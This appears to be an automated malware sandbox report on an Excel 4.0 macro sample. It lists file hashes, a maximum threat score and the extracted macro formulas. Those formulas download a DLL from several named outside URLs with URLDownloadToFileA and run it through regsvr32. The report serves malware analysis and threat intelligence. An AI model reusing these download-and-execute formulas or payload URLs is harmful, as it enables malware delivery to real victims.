General

  • Target

    6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a

  • Size

    29KB

  • Sample

    240909-1zrtqsseqr

  • MD5

    cd0dcdbdfc1cf4b526986ec894b047d5

  • SHA1

    eeb5a806d9b67394a5bf71f61f6b25968fca24ae

  • SHA256

    6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a

  • SHA512

    9f64916b236800db0888acc33f6a92022a584b4049f0409b53717f81c8701515c0c87cabbfdabeab68b4d71d813b43cfa8c870d749e66246abdd375c06217024

  • SSDEEP

    384:2ClT2l8Un7pfmnAcLK5J9AVs6TeEB/g4Bmq3FrEBTqzGFzHZnRCMfUVhnI6k8PS:2ClnUn7FmD4ys2ewg4F32B3HpoxxJja

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.casache.com/web/gTj3TrZ/","..\rfs.dll",0,0)
    =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.aulavirtualapecc.com/server/oib/","..\rfs.dll",0,0))
    =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://30aweddingco.com/cgi-bin/QUx/","..\rfs.dll",0,0))
    =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blacksmithbooks.com/blog/OkmsfYUA/","..\rfs.dll",0,0))
    =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consultores-sic.com/fw/AOOfOtj1qqgLWR/","..\rfs.dll",0,0))
    =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.tugarden.com/docs/csv_import/xGmX9fs73iJl/","..\rfs.dll",0,0))
    =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/XPMJ/","..\rfs.dll",0,0))
    =IF('LFEVE'!F23<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll")
    =RETURN()

Targets

    • Target

      6c244c45e828380d74c790dc5423fce255daac08d19b256193c0d1d1c5b8742a

    Score
    3/10
